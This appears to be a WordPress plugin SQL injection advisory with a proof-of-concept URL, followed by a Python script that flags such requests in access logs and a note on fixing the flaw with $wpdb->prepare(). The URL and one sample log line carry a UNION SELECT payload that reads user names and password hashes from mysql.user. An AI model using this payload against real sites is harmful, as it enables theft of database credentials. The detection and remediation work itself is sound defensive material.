The plugin does not properly sanitise, validate and escape various parameters before using them in an SQL statement, leading to an SQL injection.
https://example.com/wp-admin/admin.php?page=cs-all-masking-rules&s=%27+union+SELECT+max_questions%2Cauthentication_string%2CUser%2CHost%2C1.0%2CUser+from+mysql.user+--+-
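
A log-triage check for requests shaped like the one above, as an added example that is not part of the original advisory or the plugin's code: it URL-decodes the `s` parameter on the `cs-all-masking-rules` admin page and flags SQL syntax in it. The pattern list, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Page slug and parameter name come from the advisory's request URL.
PAGE_SLUG = "cs-all-masking-rules"
SEARCH_PARAM = "s"

# Heuristics (assumption: a normal rule search contains none of these).
SUSPICIOUS = [
    ("union-select", re.compile(r"\bunion\b\s+(all\s+)?\bselect\b", re.I)),
    ("sql-comment", re.compile(r"--(\s|$)|/\*")),
    ("quote", re.compile(r"['\"]")),
    ("system-schema", re.compile(r"\b(mysql|information_schema)\.", re.I)),
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def inspect_request(target):
    """Return the names of the heuristics that fire for one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return []
    # parse_qs percent-decodes values and turns '+' into a space.
    query = parse_qs(parts.query, keep_blank_values=True)
    if PAGE_SLUG not in query.get("page", []):
        return []
    hits = []
    for value in query.get(SEARCH_PARAM, []):
        for name, pattern in SUSPICIOUS:
            if pattern.search(value) and name not in hits:
                hits.append(name)
    return hits

def scan_log(lines):
    """Return (client_ip, hits) for every access-log line that is flagged."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        hits = inspect_request(match.group(1)) if match else []
        if hits:
            findings.append((line.split()[0], hits))
    return findings

# Constructed access-log lines (documentation IP ranges); the second one
# carries the query string shown in the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=cs-all-masking-rules&s=email+rule HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin.php?page=cs-all-masking-rules&s=%27+union+SELECT+max_questions%2Cauthentication_string%2CUser%2CHost%2C1.0%2CUser+from+mysql.user+--+- HTTP/1.1" 200 7340',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin.php?page=other-plugin&s=o%27brien HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for client, hits in scan_log(SAMPLE_LOG):
        print(client, ",".join(hits))
```

Pattern matching of this kind is only useful for triaging logs; the fix for the flaw itself is to bind the search term as a query parameter, for which WordPress provides `$wpdb->prepare()`.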